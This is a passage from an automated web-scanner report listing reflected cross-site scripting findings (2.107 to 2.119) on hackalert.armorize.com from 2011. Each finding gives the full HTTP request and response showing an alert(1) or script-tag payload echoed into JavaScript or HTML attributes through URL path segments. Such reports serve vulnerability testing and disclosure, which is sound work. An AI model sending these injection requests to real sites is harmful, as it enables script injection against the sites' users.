Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:14:02 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/rich_calendar.js2ea68"-alert(1)-"f90fe1cffa7?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.107. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ad015%3balert(1)//904d991fa1a was submitted in the REST URL parameter 4. This input was echoed as ad015;alert(1)//904d991fa1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.jsad015%3balert(1)//904d991fa1a HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:15:25 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/rich_calendar.jsad015;alert(1)//904d991fa1a?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.108. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4d87f%3balert(1)//a580e806038 was submitted in the REST URL parameter 2. This input was echoed as 4d87f;alert(1)//a580e806038 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C4d87f%3balert(1)//a580e806038/_js/tooltips.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:12:30 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<4d87f;alert(1)//a580e806038/_js/tooltips.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.109. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65912"-alert(1)-"36e70dab0b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C65912"-alert(1)-"36e70dab0b6/_js/tooltips.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<65912"-alert(1)-"36e70dab0b6/_js/tooltips.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.110. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4463"><script>alert(1)</script>a96f525d50a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/a4463"><script>alert(1)</script>a96f525d50a/_js/tooltips.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:05:44 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/a4463"><script>alert(1)</script>a96f525d50a/_js/tooltips.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.111. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9cbb1%3balert(1)//b17901411b9 was submitted in the REST URL parameter 3. This input was echoed as 9cbb1;alert(1)//b17901411b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js9cbb1%3balert(1)//b17901411b9/tooltips.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:19:01 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js9cbb1;alert(1)//b17901411b9/tooltips.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.112. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95898"-alert(1)-"9820e95774d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js95898"-alert(1)-"9820e95774d/tooltips.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:14:42 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js95898"-alert(1)-"9820e95774d/tooltips.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.113. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b8d64%3balert(1)//0d3ed02ba17 was submitted in the REST URL parameter 4. This input was echoed as b8d64;alert(1)//0d3ed02ba17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.jsb8d64%3balert(1)//0d3ed02ba17 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:25:12 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/tooltips.jsb8d64;alert(1)//0d3ed02ba17?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.114. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89320"-alert(1)-"f06115191a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js89320"-alert(1)-"f06115191a4 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:22:43 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/tooltips.js89320"-alert(1)-"f06115191a4?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.115. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d6d8"-alert(1)-"0adc505c1eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C9d6d8"-alert(1)-"0adc505c1eb/_js/usersettings.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:06:55 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<9d6d8"-alert(1)-"0adc505c1eb/_js/usersettings.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.116. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bb61a%3balert(1)//38f6240e10d was submitted in the REST URL parameter 2. This input was echoed as bb61a;alert(1)//38f6240e10d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cbb61a%3balert(1)//38f6240e10d/_js/usersettings.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:43 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<bb61a;alert(1)//38f6240e10d/_js/usersettings.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.117. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efe3"><script>alert(1)</script>3ba901ba74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/2efe3"><script>alert(1)</script>3ba901ba74/_js/usersettings.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:05:31 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/2efe3"><script>alert(1)</script>3ba901ba74/_js/usersettings.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.118. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05a3"-alert(1)-"214e8f5794a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsf05a3"-alert(1)-"214e8f5794a/usersettings.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:52 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsf05a3"-alert(1)-"214e8f5794a/usersettings.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.119. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d6f1f%3balert(1)//6218b11bdf0 was submitted in the REST URL parameter 3. This input was echoed as d6f1f;alert(1)//6218b11bdf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsd6f1f%3balert(1)//6218b11bdf0/usersettings.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
